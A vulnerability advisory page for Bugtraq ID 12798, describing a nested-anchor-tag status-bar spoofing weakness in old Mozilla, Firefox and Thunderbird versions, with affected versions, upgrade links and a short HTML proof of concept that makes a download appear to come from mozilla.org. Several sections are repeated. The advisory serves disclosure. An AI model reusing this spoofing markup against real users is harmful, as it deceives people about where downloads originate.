Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness
BID:12798
Info
Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness
| Bugtraq ID: | 12798 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 14 2005 12:00AM |
| Updated: | Aug 28 2006 11:34PM |
| Credit: | Discovery of this weakness is credited to "bitlance winter" <[email protected]>. |
| Vulnerable: |
Mozilla Thunderbird 1.0.1 Mozilla Thunderbird 1.0 Mozilla Thunderbird 0.9 Mozilla Thunderbird 0.8 Mozilla Thunderbird 0.7.3 Mozilla Thunderbird 0.7.2 Mozilla Thunderbird 0.7.1 Mozilla Thunderbird 0.7 Mozilla Thunderbird 0.6 Mozilla Firefox 1.0.1 Mozilla Firefox 1.0 Mozilla Firefox 0.10.1 Mozilla Firefox 0.10 Mozilla Firefox 0.9.3 Mozilla Firefox 0.9.2 Mozilla Firefox 0.9.1 Mozilla Firefox 0.9 rc Mozilla Firefox 0.9 Mozilla Firefox 0.8 Mozilla Firefox Preview Release Mozilla Browser 1.7.6 Mozilla Browser 1.7.5 Mozilla Browser 1.7.4 Mozilla Browser 1.7.3 Mozilla Browser 1.7.2 Mozilla Browser 1.7.1 Mozilla Browser 1.7 |
| Not Vulnerable: |
Mozilla Thunderbird 1.5.0.5 Mozilla Firefox 1.5 .6 |
Discussion
Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness
Mozilla Suite/Firefox and Thunderbird are reported prone to a URI obfuscation weakness. The issue is reported to manifest when 'Save Link As...' functionality is invoked on an malicious anchor tag.
This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present downloads to users that seem to originate from a trusted location. This may facilitate attacks based on this false sense of trust.
Mozilla Suite/Firefox and Thunderbird are reported prone to a URI obfuscation weakness. The issue is reported to manifest when 'Save Link As...' functionality is invoked on an malicious anchor tag.
This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present downloads to users that seem to originate from a trusted location. This may facilitate attacks based on this false sense of trust.
Exploit / POC
Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness
The following proof of concept is available:
<h1>Firefox 1.01 : spoofing status bar without using JavaScript</h1>
<p>Save the New Features about Firefox 1.02 ( PDF 20K )</p>
<p>Right Click and Save Link as ...<p>
<div>
<a href="http://www.mozilla.org/features_ff102.pdf">
<table><tr><td>
<a href="http://www.tpc.org/tpch/spec/tpch2.1.0.pdf">download : http://www.mozilla.org/features_ff102.pdf
</a><!-- first -->
</td></tr></table>
</a><!-- second -->
</div>
The following proof of concept is available:
<h1>Firefox 1.01 : spoofing status bar without using JavaScript</h1>
<p>Save the New Features about Firefox 1.02 ( PDF 20K )</p>
<p>Right Click and Save Link as ...<p>
<div>
<a href="http://www.mozilla.org/features_ff102.pdf">
<table><tr><td>
<a href="http://www.tpc.org/tpch/spec/tpch2.1.0.pdf">download : http://www.mozilla.org/features_ff102.pdf
</a><!-- first -->
</td></tr></table>
</a><!-- second -->
</div>
Solution / Fix
Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness
Solution:
Reports indicate that this issue does not affect Mozilla Firefox 1.5.0.6, or Mozilla Thunderbird 1.5.0.5
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Mozilla Firefox Preview Release
Mozilla Firefox 0.10
Mozilla Firefox 0.10.1
Mozilla Thunderbird 0.6
Mozilla Thunderbird 0.7
Mozilla Thunderbird 0.7.1
Mozilla Thunderbird 0.7.2
Mozilla Thunderbird 0.7.3
Mozilla Firefox 0.8
Mozilla Thunderbird 0.8
Mozilla Thunderbird 0.9
Mozilla Firefox 0.9 rc
Mozilla Firefox 0.9
Mozilla Firefox 0.9.1
Mozilla Firefox 0.9.2
Mozilla Firefox 0.9.3
Mozilla Firefox 1.0
Mozilla Thunderbird 1.0
Mozilla Firefox 1.0.1
Mozilla Thunderbird 1.0.1
Solution:
Reports indicate that this issue does not affect Mozilla Firefox 1.5.0.6, or Mozilla Thunderbird 1.5.0.5
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Mozilla Firefox Preview Release
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Firefox 0.10
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Firefox 0.10.1
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Thunderbird 0.6
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
Mozilla Thunderbird 0.7
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
Mozilla Thunderbird 0.7.1
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
Mozilla Thunderbird 0.7.2
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
Mozilla Thunderbird 0.7.3
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
Mozilla Firefox 0.8
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Thunderbird 0.8
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
Mozilla Thunderbird 0.9
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
Mozilla Firefox 0.9 rc
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Firefox 0.9
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Firefox 0.9.1
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Firefox 0.9.2
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Firefox 0.9.3
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Firefox 1.0
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Thunderbird 1.0
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
Mozilla Firefox 1.0.1
-
Mozilla Firefox 1.5.0.6
http://www.mozilla.com/products/download.html?product=firefox-1.5.0.6& os=win&lang=en-US
Mozilla Thunderbird 1.0.1
-
Mozilla Thunderbird 1.5.0.5
http://www.mozilla.com/products/download.html?product=thunderbird-1.5. 0.5&os=linux&lang=en-US
References
Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness
References:
References:
- Cisco NX-OS Download Page (Cisco)
- Mozilla Firefox Home Page (Mozilla)
- Mozilla Homepage (Mozilla Foundation)